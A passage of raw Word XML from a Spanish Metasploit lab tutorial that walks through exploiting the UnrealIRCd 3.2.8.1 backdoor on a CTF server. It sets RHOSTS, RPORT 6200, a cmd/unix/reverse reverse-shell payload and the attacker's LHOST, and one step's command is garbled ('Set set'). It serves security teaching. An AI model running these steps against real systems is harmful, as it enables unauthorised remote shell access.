          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>exploit/unix/irc/unreal_ircd_3281_backdoor: Ruta completa del exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A9EB9E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Carga el módulo de exploit en memoria para que puedas configurarlo y ejecutarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0E4BC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> El prompt cambiará a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14066B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447161B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Esto indica que ahora estás "dentro" del módulo del exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2627DE8E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 4: Ver las opciones configurables del exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291B1C5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="009717D4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DB7A6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Muestra todas las opciones configurables del exploit actual, indicando cuáles son obligatorias y cuáles opcionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B100E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FDCD75" w14:textId="5CEE63F8" w:rsidR="00850BD7" w:rsidRPr="00A86A33" w:rsidRDefault="00850BD7" w:rsidP="00850BD7">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="407E1B61" wp14:editId="4BEB8670">
            <wp:extent cx="5547624" cy="2066888"/>
            <wp:effectExtent l="76200" t="76200" r="129540" b="124460"/>
            <wp:docPr id="1339434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34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379" cy="207015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29781" w14:textId="56041799" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00850BD7">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis de las opciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B12D8" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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t>RHOSTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> (Remote Hosts): La IP del objetivo - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REQUERIDO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> y está vacío</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358EC049" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43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t>RPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> (Remote Port): El puerto del servicio - Por defecto es 6667</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407385DD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 5: Configurar el objetivo (RHOSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE344DB" w14:textId="798EAE06" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="00850BD7">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED2427" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD549AB" w14:textId="316107D4" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7078033A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
        </w:rPr>
        <w:t>set RHOSTS 54.123.45.67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720CDAB" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EEDDD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>set: Comando para establecer valores de opciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307821D6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>RHOSTS: La opción que queremos configurar (Remote Hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB6CD76" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>&lt;IP&gt;: La dirección IP de nuestra víctima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4DC9D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Le dice a Metasploit a qué máquina debe atacar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A28D640" w14:textId="77777777" w:rsidR="00850BD7" w:rsidRPr="00A86A33" w:rsidRDefault="00850BD7" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C06E72" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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lastRenderedPageBreak/>
        <w:t>Paso 6: Configurar el puerto correcto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59C52E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">El servicio en nuestro laboratorio corre en el puerto </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6200</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>, no en el 6667 predeterminado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE77A3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00F84CB4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>set RPORT 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007080DC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C26D3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>RPORT: Remote Port (puerto remoto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A619E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>6200: El puerto donde corre nuestro servicio vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BFBE3E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Por qué cambiar esto?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Porque aunque el estándar de IRC es 6667, nuestro servidor CTF usa 6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2342D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 7: Verificar la configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C89285" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00F84CB4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9A8A6" w14:textId="2EB8C300" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Verifica q</w:t>
      </w:r>
      <w:r w:rsidR="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>e veas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A8C8C" w14:textId="3F83D308" w:rsidR="0061535E" w:rsidRPr="00A86A33" w:rsidRDefault="00A86A33" w:rsidP="00A86A33">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46A45439" wp14:editId="6133C2D9">
            <wp:extent cx="5512453" cy="1136374"/>
            <wp:effectExtent l="76200" t="76200" r="126365" b="140335"/>
            <wp:docPr id="1725283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83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829" cy="1137894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C19DF" w14:textId="364CE013" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00A86A33">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="424"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Asegúrate de que RHOSTS tenga tu IP</w:t>
      </w:r>
      <w:r w:rsidR="00A86A33">
        <w:t xml:space="preserve"> victima</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> y RPORT sea 6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A093895" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 8: Seleccionar el payload (carga útil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC8B4B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00F84CB4">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58086395" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00D55935" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55935">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E132D4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>PAYLOAD: El código que se ejecutará después de explotar la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67D7D7" w14:textId="2497724B" w:rsidR="00ED2427" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>cmd/unix/reverse: Un payload que nos dará una shell reversa de comandos Unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED724D" w14:textId="0897E433" w:rsidR="007B0DA2" w:rsidRDefault="007B0DA2" w:rsidP="007B0DA2">
      <w:pPr>
        <w:ind w:left="1004"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55935">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461A1BBE" wp14:editId="17F59108">
            <wp:extent cx="5294735" cy="864705"/>
            <wp:effectExtent l="76200" t="76200" r="134620" b="126365"/>
            <wp:docPr id="1986096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965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404" cy="86906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0315D" w14:textId="0046B9CF" w:rsidR="00ED2427" w:rsidRPr="00D55935" w:rsidRDefault="00ED2427" w:rsidP="007B0DA2">
      <w:pPr>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55935">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es un payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02A9F4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Es el código que queremos ejecutar en el sistema comprometido. Hay muchos tipos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273EE86F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: Nos da una línea de comandos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3367A84A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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lastRenderedPageBreak/>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: Una shell avanzada con más funcionalidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB0010A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: Se conecta de vuelta a nosotros (útil para evadir firewalls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF2EE8C" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361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1D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Paso 9: Configurar tu IP de atacante (LHOST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB64F0A" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>Este es un paso CRÍTICO que muchos olvidan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33033F33" w14:textId="02D84C28" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>set LHOST &lt;TU_IP_DE_KALI&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C5814" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Cómo saber tu IP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBB4DB" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>Primero, abre OTRA terminal (no cierres Metasploit) y ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63861B3C" w14:textId="54B0DB16" w:rsidR="001D2361" w:rsidRPr="00A60CA3" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60CA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip addr show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACFB95F" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o más simple:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E072C8D" w14:textId="7EDBE61E" w:rsidR="001D2361" w:rsidRPr="00A60CA3" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60CA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hostname -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74452284" w14:textId="77777777" w:rsidR="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r>
        <w:t>Busca tu IP local (típicamente empieza con 10.x.x.x, 172.x.x.x o 192.168.x.x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A278E" w14:textId="77777777" w:rsidR="001D2361" w:rsidRPr="001D2361" w:rsidRDefault="001D2361" w:rsidP="001D2361">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2361">
